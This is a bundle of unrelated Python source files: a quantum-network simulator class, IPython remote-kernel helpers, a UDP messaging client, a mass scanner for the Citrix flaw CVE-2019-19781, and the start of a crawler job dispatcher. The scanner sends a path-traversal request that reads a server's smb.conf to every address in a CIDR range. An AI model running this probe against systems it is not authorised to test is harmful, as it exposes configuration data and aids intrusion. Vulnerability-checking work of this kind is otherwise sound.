Host (Host): Host with the *host_id*
"""
if host_id not in self.ARP:
return None
return self.ARP[host_id]
def get_ARP(self):
"""
Returns the ARP table.
Returns:
dict: The ARP table
"""
return self.ARP
def get_host_name(self, host_id):
"""
        Returns the name of the host with *host_id* if the host is in the ARP table, otherwise returns None.
        Args:
            host_id (str): ID number of the host whose name is returned.
        Returns:
            str or None: Name of the host
"""
if host_id not in self.ARP:
return None
return self.ARP[host_id].cqc.name
def get_quantum_route(self, source, dest):
"""
Gets the route for quantum information from source to destination.
Args:
source (str): ID of the source host
dest (str): ID of the destination host
Returns:
route (list): An ordered list of ID numbers on the shortest path from source to destination.
"""
return self.quantum_routing_algo(self.quantum_network, source, dest)
def get_classical_route(self, source, dest):
"""
Gets the route for classical information from source to destination.
Args:
source (str): ID of the source host
dest (str): ID of the destination host
Returns:
route (list): An ordered list of ID numbers on the shortest path from source to destination.
"""
return self.classical_routing_algo(self.classical_network, source, dest)
def _entanglement_swap(self, sender, receiver, route, q_id, o_seq_num, blocked):
"""
Performs a chain of entanglement swaps with the hosts between sender and receiver to create a shared EPR pair
between sender and receiver.
Args:
sender (Host): Sender of the EPR pair
receiver (Host): Receiver of the EPR pair
route (list): Route between the sender and receiver
q_id (str): Qubit ID of the sent EPR pair
o_seq_num (int): The original sequence number
blocked (bool): If the pair being distributed is blocked or not
"""
host_sender = self.get_host(sender)
def establish_epr(net, s, r):
if not net.shares_epr(s, r):
self.get_host(s).send_epr(r, q_id, await_ack=True)
else:
old_id = self.get_host(s).change_epr_qubit_id(r, q_id)
                # use the bound parameter `s` rather than the loop variable, which may have advanced
                net.get_host(r).change_epr_qubit_id(s, q_id, old_id)
# Create EPR pairs on the route, where all EPR qubits have the id q_id
threads = []
for i in range(len(route) - 1):
threads.append(DaemonThread(establish_epr, args=(self, route[i], route[i + 1])))
for t in threads:
t.join()
for i in range(len(route) - 2):
host = self.get_host(route[i + 1])
q = host.get_epr(route[0], q_id, wait=10)
if q is None:
print("Host is %s" % host.host_id)
print("Search host is %s" % route[0])
print("Search id is %s" % q_id)
print("EPR storage is")
print(host.EPR_store)
Logger.get_instance().error('Entanglement swap failed')
return
data = {'q': q,
'eq_id': q_id,
'node': sender,
'o_seq_num': o_seq_num,
'type': Constants.EPR}
if route[i + 2] == route[-1]:
data = {'q': q,
'eq_id': q_id,
'node': sender,
'ack': True,
'o_seq_num': o_seq_num,
'type': Constants.EPR}
host.send_teleport(route[i + 2], None, await_ack=True, payload=data, generate_epr_if_none=False)
# Change in the storage that the EPR qubit is shared with the receiver
q2 = host_sender.get_epr(route[1], q_id=q_id)
host_sender.add_epr(receiver, q2, q_id, blocked)
Logger.get_instance().log('Entanglement swap was successful for pair with id '
+ q_id + ' between ' + sender + ' and ' + receiver)
def _establish_epr(self, sender, receiver, q_id, o_seq_num, blocked):
"""
        Instead of doing an entanglement swap, for efficiency we establish EPR pairs
        directly in the simulation, if an entanglement swap would have been possible.
Args:
sender (Host): Sender of the EPR pair
receiver (Host): Receiver of the EPR pair
q_id (str): Qubit ID of the sent EPR pair
o_seq_num (int): The original sequence number
blocked (bool): If the pair being distributed is blocked or not
"""
host_sender = self.get_host(sender)
host_receiver = self.get_host(receiver)
q1 = Qubit(host_sender)
q2 = Qubit(host_sender)
q1.H()
q1.cnot(q2)
host_sender.add_epr(receiver, q1, q_id, blocked)
host_receiver.add_epr(sender, q2, q_id, blocked)
host_receiver.send_ack(sender, o_seq_num)
def _route_quantum_info(self, sender, receiver, qubits):
"""
Routes qubits from sender to receiver.
Args:
sender (Host): Sender of qubits
            receiver (Host): Receiver of the qubits
qubits (List of Qubits): The qubits to be sent
"""
def transfer_qubits(r, s, original_sender=None):
for q in qubits:
# Modify the qubit according to error function of the model
qubit_id = q.id
q = self.ARP[s].quantum_connections[self.ARP[r].host_id].model.qubit_func(q)
if q is None:
# Log failure of transmission if qubit is lost
Logger.get_instance().log('transfer qubits - transfer of qubit ' + qubit_id + ' failed')
return False
else:
Logger.get_instance().log('transfer qubits - sending qubit ' + q.id)
q.send_to(self.ARP[r].host_id)
Logger.get_instance().log('transfer qubits - received ' + q.id)
# Unblock qubits in case they were blocked
q.blocked = False
if self.ARP[r].q_relay_sniffing:
self.ARP[r].q_relay_sniffing_fn(original_sender, receiver, q)
return True
route = self.get_quantum_route(sender, receiver)
i = 0
while i < len(route) - 1:
Logger.get_instance().log('sending qubits from ' + route[i] + ' to ' + route[i + 1])
if not transfer_qubits(route[i + 1], route[i], original_sender=route[0]):
return False
i += 1
return True
def _process_queue(self):
"""
Runs a thread for processing the packets in the packet queue.
"""
while True:
packet = self._packet_queue.get()
if not packet:
# Stop the network
self._stop_thread = True
break
# Artificially delay the network
if self.delay > 0:
time.sleep(self.delay)
# Simulate packet loss
packet_drop_var = random.random()
if packet_drop_var > (1 - self.packet_drop_rate):
Logger.get_instance().log("PACKET DROPPED")
if packet.payload_type == Constants.QUANTUM:
packet.payload.release()
continue
sender, receiver = packet.sender, packet.receiver
if packet.payload_type == Constants.QUANTUM:
if not self._route_quantum_info(sender, receiver, [packet.payload]):
continue
try:
if packet.protocol == Constants.RELAY and not self.use_hop_by_hop:
full_route = packet.route
route = full_route[full_route.index(sender):]
                else:
                    # Both the REC_EPR case and the generic case resolve the same classical route.
                    route = self.get_classical_route(sender, receiver)
if len(route) < 2:
raise Exception('No route exists')
elif len(route) == 2:
if packet.protocol != Constants.RELAY:
if packet.protocol == Constants.REC_EPR:
host_sender = self.get_host(sender)
q = host_sender \
.backend \
.create_EPR(host_sender.host_id,
receiver,
q_id=packet.payload['q_id'],
block=packet.payload['blocked'])
host_sender.add_epr(receiver, q)
self.ARP[receiver].rec_packet(packet)
else:
self.ARP[receiver].rec_packet(packet.payload)
else:
if packet.protocol == Constants.REC_EPR:
q_id = packet.payload['q_id']
blocked = packet.payload['blocked']
q_route = self.get_quantum_route(sender, receiver)
if self.use_ent_swap:
DaemonThread(self._entanglement_swap,
args=(sender, receiver, q_route, q_id,
packet.seq_num, blocked))
else:
DaemonThread(self._establish_epr,
args=(sender, receiver, q_id,
packet.seq_num, blocked))
else:
network_packet = self._encode(route, packet)
self.ARP[route[1]].rec_packet(network_packet)
except nx.NodeNotFound:
Logger.get_instance().error("route couldn't be calculated, node doesn't exist")
except ValueError:
Logger.get_instance().error("route couldn't be calculated, value error")
except Exception as e:
Logger.get_instance().error('Error in network: ' + str(e))
def send(self, packet):
"""
Puts the packet to the packet queue of the network.
Args:
packet (Packet): Packet to be sent
"""
self._packet_queue.put(packet)
def stop(self, stop_hosts=False):
"""
Stops the network.
"""
Logger.get_instance().log("Network stopped")
try:
if stop_hosts:
for host in self.ARP:
self.ARP[host].stop(release_qubits=True)
self.send(None) # Send None to queue to stop the queue
if self._backend is not None:
self._backend.stop()
except Exception as e:
Logger.get_instance().error(e)
def start(self, nodes=None, backend=None):
"""
Starts the network.
"""
if backend is None:
self._backend = EQSNBackend()
else:
self._backend = backend
if nodes is not None:
self._backend.start(nodes=nodes)
self._queue_processor_thread = DaemonThread(target=self._process_queue)
def draw_classical_network(self):
"""
Draws a plot of the network.
"""
nx.draw_networkx(self.classical_network, pos=nx.spring_layout(self.classical_network),
with_labels=True)
plt.show()
def draw_quantum_network(self):
"""
Draws a plot of the network.
"""
nx.draw_networkx(self.quantum_network, pos=nx.spring_layout(self.quantum_network),
with_labels=True)
plt.show()
def _encode(self, route, payload, ttl=10):
"""
        Adds another layer to the packet if the route length between sender and receiver is greater than 2.
        Sets the protocol flag in this layer to RELAY and the payload_type to SIGNAL, and adds
        Time-To-Live information to this layer.
Args:
route: route of the packet from sender to receiver
payload (Object): Lower layers of the packet
ttl(int): Time-to-Live parameter
Returns:
RoutingPacket: Encoded RELAY packet
"""
if payload.protocol != Constants.RELAY:
packet = RoutingPacket(route[1], '', Constants.RELAY, Constants.SIGNAL,
payload, ttl, route)
else:
packet = payload
packet.sender = route[1]
if self.use_hop_by_hop:
packet.receiver = route[-1]
else:
packet.receiver = route[2]
return packet
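# Hedged usage sketch (not part of the original QuNetSim sources): wiring two hosts into
# the singleton network. The Host import and its add_connection()/start() calls are
# assumptions about the package layout, not defined in this file.
#
#   from qunetsim.components import Host
#
#   network = Network.get_instance()
#   network.start()
#   alice, bob = Host('Alice'), Host('Bob')
#   alice.add_connection('Bob')
#   bob.add_connection('Alice')
#   alice.start()
#   bob.start()
#   network.add_hosts([alice, bob])
#   ...
#   network.stop(stop_hosts=True)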
|
_ipython_utils.py
|
"""Utilities for integrating with IPython
These functions should probably reside in Jupyter and IPython repositories,
after which we can import them instead of having our own definitions.
"""
import atexit
import os
try:
import queue
except ImportError:
# Python 2
import Queue as queue
from subprocess import Popen
import sys
from threading import Thread
from uuid import uuid4
from tornado.gen import TimeoutError
from tornado.ioloop import IOLoop
from threading import Event
from IPython import get_ipython
from jupyter_client import BlockingKernelClient, write_connection_file
from jupyter_core.paths import jupyter_runtime_dir
OUTPUT_TIMEOUT = 10
def run_cell_remote(ip, kc, cell):
"""Run a cell on a KernelClient
Any output from the cell will be redisplayed in the local session.
"""
msg_id = kc.execute(cell)
in_kernel = getattr(ip, "kernel", False)
if in_kernel:
socket = ip.display_pub.pub_socket
session = ip.display_pub.session
parent_header = ip.display_pub.parent_header
while True:
try:
msg = kc.get_iopub_msg(timeout=OUTPUT_TIMEOUT)
except queue.Empty:
raise TimeoutError("Timeout waiting for IPython output")
if msg["parent_header"].get("msg_id") != msg_id:
continue
msg_type = msg["header"]["msg_type"]
content = msg["content"]
if msg_type == "status":
if content["execution_state"] == "idle":
# idle means output is done
break
elif msg_type == "stream":
stream = getattr(sys, content["name"])
stream.write(content["text"])
elif msg_type in ("display_data", "execute_result", "error"):
if in_kernel:
session.send(socket, msg_type, content, parent=parent_header)
else:
if msg_type == "error":
print("\n".join(content["traceback"]), file=sys.stderr)
else:
sys.stdout.write(content["data"].get("text/plain", ""))
else:
pass
def register_worker_magic(connection_info, magic_name="worker"):
"""Register a %worker magic, given connection_info.
Both a line and cell magic are registered,
which run the given cell in a remote kernel.
"""
ip = get_ipython()
info = dict(connection_info) # copy
key = info.pop("key")
    kc = BlockingKernelClient(**info)  # use the copy with 'key' popped off
kc.session.key = key
kc.start_channels()
def remote(line, cell=None):
"""Run the current cell on a remote IPython kernel"""
if cell is None:
# both line and cell magic
cell = line
run_cell_remote(ip, kc, cell)
remote.client = kc # preserve reference on kc, largely for mocking
ip.register_magic_function(remote, magic_kind="line", magic_name=magic_name)
ip.register_magic_function(remote, magic_kind="cell", magic_name=magic_name)
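# Usage sketch for the magics registered above (an assumption, mirroring the pattern in
# the remote_magic docstring below rather than code taken from the sources):
#
#   register_worker_magic(connection_info)
#   %worker worker.data           # line magic: run one statement on the remote kernel
#   %%worker                      # cell magic: run the whole cell on the remote kernel
#   import os; os.getpid()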
def remote_magic(line, cell=None):
"""A magic for running code on a specified remote worker
The connection_info dict of the worker will be looked up
as the first positional arg to the magic.
The rest of the line (or the entire cell for a %%cell magic)
will be passed to the remote kernel.
Usage:
info = e.start_ipython(worker)[worker]
%remote info print(worker.data)
"""
# get connection info from IPython's user namespace
ip = get_ipython()
split_line = line.split(None, 1)
info_name = split_line[0]
if info_name not in ip.user_ns:
raise NameError(info_name)
connection_info = dict(ip.user_ns[info_name])
if not cell: # line magic, use the rest of the line
if len(split_line) == 1:
raise ValueError("I need some code to run!")
cell = split_line[1]
# turn info dict to hashable str for use as lookup key in _clients cache
key = ",".join(map(str, sorted(connection_info.items())))
session_key = connection_info.pop("key")
if key in remote_magic._clients:
kc = remote_magic._clients[key]
else:
kc = BlockingKernelClient(**connection_info)
kc.session.key = session_key
kc.start_channels()
kc.wait_for_ready(timeout=10)
remote_magic._clients[key] = kc
# actually run the code
run_cell_remote(ip, kc, cell)
# cache clients for re-use in remote magic
remote_magic._clients = {}
def register_remote_magic(magic_name="remote"):
"""Define the parameterized %remote magic
See remote_magic above for details.
"""
ip = get_ipython()
if ip is None:
return # do nothing if IPython's not running
ip.register_magic_function(remote_magic, magic_kind="line", magic_name=magic_name)
ip.register_magic_function(remote_magic, magic_kind="cell", magic_name=magic_name)
def connect_qtconsole(connection_info, name=None, extra_args=None):
"""Open a QtConsole connected to a worker who has the given future
- identify worker with who_has
- start IPython kernel on the worker
- start qtconsole connected to the kernel
"""
runtime_dir = jupyter_runtime_dir()
if name is None:
name = uuid4().hex
path = os.path.join(runtime_dir, name + ".json")
write_connection_file(path, **connection_info)
cmd = ["jupyter", "qtconsole", "--existing", path]
if extra_args:
cmd.extend(extra_args)
Popen(cmd)
@atexit.register
def _cleanup_connection_file():
"""Cleanup our connection file when we exit."""
try:
os.remove(path)
except OSError:
pass
def start_ipython(ip=None, ns=None, log=None):
"""Start an IPython kernel in a thread
Parameters
----------
ip : str
The IP address to listen on (likely the parent object's ip).
ns : dict
Any names that should be injected into the IPython namespace.
log : logger instance
Hook up IPython's logging to an existing logger instead of the default.
"""
from IPython import get_ipython
if get_ipython() is not None:
raise RuntimeError("Cannot start IPython, it's already running.")
from zmq.eventloop.ioloop import ZMQIOLoop
from ipykernel.kernelapp import IPKernelApp
# save the global IOLoop instance
# since IPython relies on it, but we are going to put it in a thread.
save_inst = IOLoop.instance()
IOLoop.clear_instance()
zmq_loop = ZMQIOLoop()
zmq_loop.install()
# start IPython, disabling its signal handlers that won't work due to running in a thread:
app = IPKernelApp.instance(log=log)
# Don't connect to the history database
app.config.HistoryManager.hist_file = ":memory:"
# listen on all interfaces, so remote clients can connect:
if ip:
app.ip = ip
# disable some signal handling, logging
def noop():
return None
app.init_signal = noop
app.log_connection_info = noop
# start IPython in a thread
# initialization happens in the thread to avoid threading problems
# with the sqlite history
evt = Event()
def _start():
app.initialize([])
app.kernel.pre_handler_hook = noop
app.kernel.post_handler_hook = noop
app.kernel.start()
app.kernel.loop = IOLoop.instance()
# save self in the IPython namespace as 'worker'
# inject things into the IPython namespace
if ns:
app.kernel.shell.user_ns.update(ns)
evt.set()
zmq_loop.start()
zmq_loop_thread = Thread(target=_start)
zmq_loop_thread.daemon = True
zmq_loop_thread.start()
assert evt.wait(timeout=5), "IPython didn't start in a reasonable amount of time."
# put the global IOLoop instance back:
IOLoop.clear_instance()
save_inst.install()
return app
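# Hedged sketch of how the helpers above fit together (an assumption about the calling
# code, not taken from the dask/distributed sources; get_connection_info() on the kernel
# app is assumed to be provided by jupyter_client's connection mixin):
#
#   app = start_ipython(ip='127.0.0.1', ns={'worker': worker}, log=log)
#   connection_info = app.get_connection_info()
#   register_worker_magic(connection_info)   # %worker / %%worker
#   register_remote_magic()                  # %remote info <code>
#   connect_qtconsole(connection_info)       # optional GUI console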
|
udp.py
|
import socket
import sys
import traceback
import struct
import threading
from threading import Thread
import time
import datetime
import json
import buffered_message
from connection_state import ConnectionState
import uuid
# *************
# EXAMPLE USAGE
# *************
"""
import socket
import udp
def connect1(ip, port):
print "%s [%s]: new connection received at client 1" % (ip, port)
def connect2(ip, port):
print "%s [%s]: new connection received at client 2" % (ip, port)
def message1(ip, port):
print "%s [%s]: message received at client 1" % (ip, port)
def message2(ip, port):
print "%s [%s]: message received at client 2" % (ip, port)
def timeout1(ip, port):
print "%s [%s]: timeout at client 1" % (ip, port)
def timeout2(ip, port):
print "%s [%s]: timeout at client 2" % (ip, port)
def disconnect1(ip, port):
print "%s [%s]: peer disconnection at client 1" % (ip, port)
def disconnect2(ip, port):
print "%s [%s]: peer disconnection at client 2" % (ip, port)
def failed_connect1(ip, port):
print "%s [%s]: connection to this peer FAILED at client 1" % (ip, port)
def failed_connect2(ip, port):
print "%s [%s]: connection to this peer FAILED at client 2" % (ip, port)
client1_ip = socket.gethostbyname(socket.gethostname())
client1_port = 29779
client2_ip = socket.gethostbyname(socket.gethostname())
client2_port = 29778
buffer_size = 128
client1 = udp.UDP_Client(True, client1_ip, client1_port, client2_ip, client2_port, buffer_size, True, failed_connect1, message1, timeout1, connect1, disconnect1, True)
client2 = udp.UDP_Client(True, client2_ip, client2_port, client1_ip, client1_port, buffer_size, True, failed_connect2, message2, timeout2, connect2, disconnect2, True)
client1.send_message([5,6,7], True)
client2.pop_message(True)
client2.send_message("Message from client2.")
client1.pop_message()
client1.disconnect()
client2.disconnect()
"""
class UDP_Client:
def __init__(
self,
start_listen_thread=False,
local_ip=socket.gethostbyname(socket.gethostname()),
local_port=29779,
target_ip=socket.gethostbyname(socket.gethostname()),
target_port=29778,
buffer_size=1024,
keep_alive=False,
failed_to_connect_callback=None,
message_received_callback=None,
keep_alive_timeout_callback=None,
new_peer_connected_callback=None,
peer_disconnected_callback=None,
require_ack=False,
):
self.target_ip = target_ip
self.target_port = target_port
self.keep_alive = keep_alive
self.failed_to_connect_callback = failed_to_connect_callback
self.message_received_callback = message_received_callback
self.keep_alive_timeout_callback = keep_alive_timeout_callback
self.new_peer_connected_callback = new_peer_connected_callback
self.peer_disconnected_callback = peer_disconnected_callback
self.require_ack = require_ack
self.connected_peers = {
# "<ip>_<port>" : [connected_timestamp, last_message_received_timestamp, keep-alive_check_count]
}
self.buffer_size = buffer_size
self.message_manager = buffered_message.Buffered_Message_Manager(self.buffer_size)
self.timeout = 3.0
self.send_queue = []
self.thread_sleep_duration = 0.1
        self.keep_alive_timeout = 30  # 30 seconds
#self.keep_alive_timestamp = time.time()
self.keep_alive_interval = 3
self.keep_alive_send_timestamp = time.time()
        self.peer_username = ""  # username belonging to the remote peer
self.error_log = []
self.resend_interval = 3 # used when require_ack = True
# track previous deliberate disconnections to make sure keep-alive functionality doesn't resurrect those connections.
self.disconnected_peers = {
#"<ip>_<port>": <disconnection timestamp>
}
self.disconnect_lockout_duration = self.keep_alive_interval * 2
self.bind_socket(local_ip, local_port)
self.connection_state = ConnectionState(False)
if(start_listen_thread):
self.start_listening()
self.connection_attempt_timeout = 5 # seconds
self.received_acks = []
def connect_async(self, target_ip, target_port):
Thread(target=self.connect, args=(target_ip, target_port)).start()
def connect(self, target_ip, target_port):
peer = "%s_%s" % (target_ip, target_port)
# send keep-alive packet
self.send_message("1", False, False, target_ip, int(target_port))
start_time = time.time()
time_elapsed = 0
while peer not in self.connected_peers:
time.sleep(0.5)
time_elapsed = time.time() - start_time
if time_elapsed > self.connection_attempt_timeout:
if self.failed_to_connect_callback != None:
self.failed_to_connect_callback(target_ip, int(target_port))
return False
return True
def init_socket(self):
try:
# close open socket, if there are any.
if(hasattr(self, "sock")):
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
except:
pass
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def handle_peer_disconnect(self, peer):
self.disconnected_peers[peer] = time.time()
addr = peer.split("_")
del self.connected_peers[peer]
if self.peer_disconnected_callback != None:
self.peer_disconnected_callback(addr[0], int(addr[1]))
def bind_socket(self, local_ip=socket.gethostbyname(socket.gethostname()), local_port=29779):
self.local_port = local_port
self.local_ip = local_ip
# (Re)initialize socket before binding.
self.init_socket()
self.sock.settimeout(self.timeout)
self.sock.bind((local_ip, local_port))
def prepend_unique_id(self, message):
return "%s__%s" % (str(uuid.uuid4()), message)
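    # Message-id convention (a summary of the code below, added for clarity): messages are
    # queued as "<uuid4>__<payload>"; send_message_loop() splits the id back off before
    # sendto() and, when require_ack is enabled, uses it to match "ack <id>" replies
    # collected in self.received_acks. The special payloads "1" and "2" mean keep-alive
    # and disconnect respectively.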
def send_message(self, message, json_encode=False, prepare=True, _target_ip=None, _target_port=None):
target_ip = _target_ip if _target_ip != None else self.target_ip
target_port = _target_port if _target_port != None else self.target_port
# !!! WARNING !!!
# If you pass prepare as False, you MUST ensure message doesn't exceed buffer-size yourself.
msg = message
if(json_encode):
msg = json.dumps(msg)
messages = [[self.prepend_unique_id(msg), 0],]
prepared_message_packets = [messages, target_ip, target_port]
if prepare:
messages = [[self.prepend_unique_id(message), 0] for message in self.message_manager.prepare_message(msg)]
prepared_message_packets = [messages, target_ip, target_port]
self.send_queue.append(prepared_message_packets)
def keep_alive_send_check(self):
for peer, timestamps in self.connected_peers.items():
addr = peer.split("_")
ip, port = [addr[0], int(addr[1])]
now = time.time()
diff = now - timestamps[1] #self.keep_alive_send_timestamp
next_check_time = self.keep_alive_interval * (timestamps[2] + 1)
if diff > next_check_time:
self.connected_peers[peer][2] += 1
self.connected_peers[peer][1] = now
self.send_message("1", False, False, ip, port)
def send_message_loop(self):
connection_state = self.connection_state
prepared_message_packets, target_ip, target_port, last_sent = [None, None, None, None]
while connection_state.active:
if self.keep_alive:
self.keep_alive_send_check()
message_count = len(self.send_queue)
index = -1
for i in range(0, message_count):
index += 1
if not self.require_ack:
prepared_message_packets, target_ip, target_port = self.send_queue.pop(0)
else:
prepared_message_packets, target_ip, target_port = self.send_queue[index]
packet_index = -1
for j in range(0, len(prepared_message_packets)):
packet_index += 1
packet, last_sent = prepared_message_packets[packet_index]
if last_sent != 0 and self.require_ack:
sent_timestamp = time.time()
packet_id, packet = packet.split("__", 1)
if packet_id in self.received_acks:
del self.send_queue[index][0][packet_index]
packet_index -= 1
if len(self.send_queue[index][0]) < 1:
del self.send_queue[index]
index -= 1
continue
now = time.time()
time_difference = now - last_sent
if time_difference < self.resend_interval:
continue
# update the last sent timestamp for this packet
if self.require_ack:
self.send_queue[index][0][j][1] = time.time()
try:
self.sock.sendto(packet, (target_ip, target_port))
except:
# todo: handle packet send timeout
pass
time.sleep(self.thread_sleep_duration)
def keep_alive_loop(self):
connection_state = self.connection_state
while connection_state.active:
self.send_message("1", False, False)
def stop_listening(self):
self.connection_state.active = False
try:
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
except:
pass
def start_listening(self):
if(not self.connection_state.active):
self.connection_state = ConnectionState(True)
Thread(target=self.recv_message_loop).start()
Thread(target=self.send_message_loop).start()
return True
return False
def disconnect_from_peer(self, peer_ip, peer_port):
peer = "%s_%s" % (peer_ip, peer_port)
if peer not in self.connected_peers:
return False
self.disconnected_peers[peer] = time.time()
peer_port = int(peer_port)
self.send_message("2", False, False, peer_ip, peer_port)
del self.connected_peers[peer]
return True
def disconnect(self):
for peer, timestamps in self.connected_peers.items():
addr = peer.split("_")
ip, port = [addr[0], int(addr[1])]
self.send_message("2", False, False, ip, port)
time.sleep(0.5)
self.connected_peers.clear()
self.stop_listening()
def reconnect(self):
self.disconnect()
time.sleep(self.disconnect_lockout_duration + 0.5)
self.bind_socket(self.local_ip, self.local_port)
self.start_listening()
def new_connection(self, local_ip=socket.gethostbyname(socket.gethostname()), local_port=29779):
self.disconnect()
self.bind_socket(local_ip, local_port)
def check_keep_alive(self):
for peer, timestamps in self.connected_peers.items():
addr = peer.split("_")
now = time.time()
timestamp = timestamps[0]
diff = now - timestamp; #self.keep_alive_timestamp
if(diff > self.keep_alive_timeout):
del self.connected_peers[peer]
if self.keep_alive_timeout_callback != None:
self.keep_alive_timeout_callback(addr[0], int(addr[1]))
elif self.peer_disconnected_callback != None:
self.peer_disconnected_callback(addr[0], int(addr[1]))
#self.disconnect()
#err_msg = "[UDP_Client]: Client connection timed out. (peer: IP: %s Port: %s Username: %s)" % (self.target_ip, self.target_port, self.peer_username)
#timestamp = time.time()
#date_string = datetime.datetime.fromtimestamp(timestamp).strftime('(%Y-%m-%d) %H:%M:%S')
#self.error_log.append((timestamp, date_string, err_msg))
# Run this as its own thread.
def recv_message_loop(self):
connection_state = self.connection_state
while connection_state.active:
#time.sleep(0.001)
if self.keep_alive:
self.check_keep_alive()
data_raw = None
data = None
addr = None
try:
data_raw, addr = self.sock.recvfrom(self.buffer_size)
except:
continue
packet_id = None
if "__" in data_raw:
packet_id, data = data_raw.split("__", 1)
else:
data = data_raw
peer = "%s_%s" % (addr[0], addr[1])
ip, port = [addr[0], int(addr[1])]
if peer in self.disconnected_peers:
disconnect_limit = self.disconnected_peers[peer] + self.disconnect_lockout_duration
now = time.time()
# should we ignore this message?
if now <= disconnect_limit:
continue
# check if peer is new or not and update keep-alive info
if peer not in self.connected_peers:
if self.new_peer_connected_callback != None:
self.new_peer_connected_callback(addr[0], int(addr[1]))
self.connected_peers[peer] = [int(time.time()), 0, 0]
else:
self.connected_peers[peer][0] = int(time.time())
self.connected_peers[peer][2] = 0 # reset the keep-alive check counter on received messages.
if self.keep_alive:
if data == "1":
#self.keep_alive_timestamp = time.time()
continue
self.send_message("1", False, False, ip, port)
if data == "2":
# peer is disconnecting.
self.handle_peer_disconnect(peer)
continue
if (len(data) > 2) and (data[:3]).lower() == "ack":
# clear associated message from the message queue.
ack_token, ack_id = data.split(" ", 1)
self.received_acks.append(ack_id)
continue
timestamp = time.time()
self.message_manager.handle_raw_message(data, addr, timestamp)
# send ack for this packet.
self.send_message("ack %s" % packet_id, False, False, ip, port)
#print "UDP duration: %s" % (time.time() - timestamp)
if self.message_received_callback != None:
self.message_received_callback(ip, port)
# Returns a list: [addr, timestamp, message]
def pop_message(self, decode_json=False):
return self.message_manager.pop_message(decode_json)
# Returns a list of lists: [[addr, timestamp, message], ...]
def pop_all_messages(self, decode_json=False):
return self.message_manager.pop_all_messages(decode_json)
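# A self-contained framing sketch (not used by the class above; all names below
# are illustrative only) of the wire format implemented by prepend_unique_id(),
# send_message() and recv_message_loop(): every packet is "<uuid>__<payload>",
# the receiver answers with "ack <uuid>", and the bare payloads "1" and "2" are
# the keep-alive and disconnect signals respectively.
def _frame_packet(payload):
    import uuid
    return "%s__%s" % (str(uuid.uuid4()), payload)

def _parse_packet(raw):
    # Returns (packet_id, payload); packets without the separator carry no id.
    if "__" in raw:
        packet_id, payload = raw.split("__", 1)
        return packet_id, payload
    return None, raw

def _build_ack(packet_id):
    return "ack %s" % packet_id

def _framing_demo():
    framed = _frame_packet('{"hello": "world"}')
    packet_id, payload = _parse_packet(framed)
    assert payload == '{"hello": "world"}'
    # The ack itself carries no "__" separator, so it parses as a bare payload.
    assert _parse_packet(_build_ack(packet_id)) == (None, "ack %s" % packet_id)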
|
cve_2019_19781_scanner.py
|
#!/usr/bin/env python3
import argparse
import multiprocessing
import ipaddress
import requests
from requests import ReadTimeout, ConnectTimeout, ConnectionError
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.exceptions import TooManyRedirects
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def worker(targets, port):
for target in targets:
try:
print('Testing: {}'.format(target), end='\r')
if port == '80':
req = requests.get('http://{}:{}/vpn/../vpns/cfg/smb.conf'.format(target, port), verify=False, timeout=2)
else:
req = requests.get('https://{}:{}/vpn/../vpns/cfg/smb.conf'.format(target, port), verify=False, timeout=2)
            content = str(req.content)
            if ('[global]' in content) and ('encrypt passwords' in content) and ('name resolve order' in content):
                print('[\033[89m!\033[0m] This Citrix ADC Server: {} is still vulnerable to CVE-2019-19781'.format(target))
            elif 'Citrix' in content or req.status_code == 403:
print('[\033[92m*\033[0m] CITRIX Server found, However the server {} is not vulnerable'.format(target))
except (ReadTimeout, TooManyRedirects, ConnectTimeout, ConnectionError):
pass
def argparser():
parser = argparse.ArgumentParser()
    parser.add_argument('target', help='the Citrix ADC host or CIDR range to scan (HTTPS unless port 80 is given)')
parser.add_argument('port', help='the target server web port (normally on 443)')
return parser.parse_args()
if __name__ == '__main__':
args = argparser()
ip_list = [str(ip) for ip in ipaddress.IPv4Network(args.target)]
jobs = []
threads = 512
    amount = max(1, -(-len(ip_list) // threads))  # ceiling division so no trailing IPs are dropped
limit = amount
for f in range(threads):
ips = ip_list[limit - amount:limit]
        j = multiprocessing.Process(target=worker, args=(ips, args.port),)
jobs.append(j)
j.start()
limit = limit + amount
for j in jobs:
j.join()
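# A small standalone sketch (illustrative only, not called by the scanner above)
# of how the expanded IP list is split across worker processes. Ceiling division
# keeps the chunks even and guarantees no trailing addresses are dropped when the
# list length is not a multiple of the worker count.
def _chunk_targets(ip_list, workers):
    size = max(1, -(-len(ip_list) // workers))  # ceiling division
    return [ip_list[i:i + size] for i in range(0, len(ip_list), size)]

# Example: _chunk_targets([str(i) for i in range(10)], 4)
#          -> [['0', '1', '2'], ['3', '4', '5'], ['6', '7', '8'], ['9']]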
|
RawJobDispatcher.py
|
import sys
import multiprocessing
import threading
import time
import traceback
import queue
import random
import datetime
import signal
import socket
import settings
import WebMirror.JobUtils
import RawArchiver.misc
import common.NetlocThrottler
import common.get_rpyc
import common.util.urlFuncs
import common.process
import common.LogBase as LogBase
import common.StatsdMixin as StatsdMixin
# import sqlalchemy.exc
# from sqlalchemy.sql import text
if '__pypy__' in sys.builtin_module_names:
import psycopg2cffi as psycopg2
else:
import psycopg2
########################################################################################################################
#
# ## ## ### #### ## ## ###### ## ### ###### ######
# ### ### ## ## ## ### ## ## ## ## ## ## ## ## ## ##
# #### #### ## ## ## #### ## ## ## ## ## ## ##
# ## ### ## ## ## ## ## ## ## ## ## ## ## ###### ######
# ## ## ######### ## ## #### ## ## ######### ## ##
# ## ## ## ## ## ## ### ## ## ## ## ## ## ## ## ##
# ## ## ## ## #### ## ## ###### ######## ## ## ###### ######
#
########################################################################################################################
NO_JOB_TIMEOUT_MINUTES = 15
largv = [tmp.lower() for tmp in sys.argv]
if "twoprocess" in largv or "oneprocess" in largv:
MAX_IN_FLIGHT_JOBS = 2
else:
# MAX_IN_FLIGHT_JOBS = 5
MAX_IN_FLIGHT_JOBS = 75
# MAX_IN_FLIGHT_JOBS = 250
# MAX_IN_FLIGHT_JOBS = 500
# MAX_IN_FLIGHT_JOBS = 1000
# MAX_IN_FLIGHT_JOBS = 3000
LOCAL_ENQUEUED_JOB_RESPONSES = 50
class RawJobFetcher(LogBase.LoggerMixin, StatsdMixin.StatsdMixin):
loggerPath = "Main.RawJobFetcher"
statsd_prefix = 'ReadableWebProxy.Proc.RawDispatcherManager'
def __init__(self):
# print("Job __init__()")
super().__init__()
self.last_rx = datetime.datetime.now()
self.active_jobs = 0
